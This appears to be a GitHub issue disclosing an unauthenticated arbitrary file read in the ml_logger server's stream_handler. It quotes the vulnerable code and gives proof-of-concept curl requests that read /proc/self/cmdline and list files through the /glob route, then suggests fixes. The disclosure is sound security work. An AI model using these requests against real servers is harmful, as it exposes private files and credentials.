Skip to content

[BUG] Unsafe file reading #74

New issue
New issue
Open
Open
[BUG] Unsafe file reading#74
@0x1f

Description

@0x1f
0x1f
opened on Sep 11, 2025

Summary

Insecure file read, allowing any unauthenticated user to read arbitrary files on the server.

Details

The routing handler function stream_handler in the file ml_logger/server.py read any file.

          async def stream_handler(self, req):
        import sanic

        if not req.json:
            msg = f"request json is empty: {req.text}"
            print(msg)
            return sanic.response.text(msg)
        load_entry = LoadEntry(**req.json)
        print(f"streaming: {load_entry.key}")
        path = self.abs_path(load_entry.key)
        return await sanic.response.file_stream(path)

The user's input parameters are not verified and filtered

PoC

curl -X GET   -H 'Content-Type: application/json' -d '{"key":"//proc/self/cmdline","type":""}' --output -  'http://127.0.0.1:8081/stream' -v
Image

Combined with the routing glob_handler, you can view any file on the server.

curl -X POST -H 'Content-Type: application/json' -d '{"query": "/tmp/*","wd": "/","start": 0,"stop": 9999}' 'http://127.0.0.1:8081/glob'
Image

Impact

Read any file on the server.

Suggestions

  • Absolute paths and directory traversal files are not allowed.
  • Only allow reading of specified files.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions